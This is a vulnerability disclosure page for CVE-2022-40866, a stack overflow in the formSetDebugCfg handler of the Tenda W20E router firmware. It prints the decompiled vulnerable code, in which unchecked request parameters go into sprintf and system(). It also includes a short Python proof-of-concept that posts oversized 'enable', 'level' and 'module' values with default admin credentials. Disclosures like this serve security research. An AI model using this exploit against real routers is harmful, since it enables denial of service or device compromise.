CVE-2022-40866: Router-vuls/setDebugCfg.md at main · CPSeek/Router-vuls
Tenda W20E router V15.11.0.6 (US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC) contains a stack overflow vulnerability in the function formSetDebugCfg with request /goform/setDebugCfg/
* Tenda W20E stack vulnerability***** Version
V15.11.0.6 (US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC)
* Firmware
* Vulnerability Detail
In function formSetDebugCfg, the content obtained by the program from the parameter "enable", “level” and “module” are passed to pcVar1 and pcVar3, and then the pcVar1, pcVar2 and pcVar3 are directly copied into the cmd stack through the sprintf function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.
void formSetDebugCfg(webs_t wp,char_t *pPath,char_t *pQuery)
{ char *pcVar1; char *pcVar2; char *pcVar3; char cmd [128]; char *pModule; char *pLevel; char *pEnable;
memset(cmd,0,0x80); pcVar1 = websGetVar(wp,"enable","2"); pcVar2 = websGetVar(wp,"level","2"); pcVar3 = websGetVar(wp,"module","httpd"); sprintf(cmd,"echo enable=%s level=%s > /var/debug/%s",pcVar1,pcVar2,pcVar3); //here is overflow system(cmd); outputToWebs(wp,cmd); return; }
import requests
cmd = b’enable=’ + b’A’ * 800 cmd += b’&level=’+ b’A’ * 800 cmd += b’&module=’+ b’A’ * 800
url = b"" payload = b"" + cmd
data = { "username": "admin", "password": "admin", }
def attack(): s = requests.session() resp = s.post(url=url, data=data) print(resp.content) resp = s.post(url=payload, data=data) print(resp.content)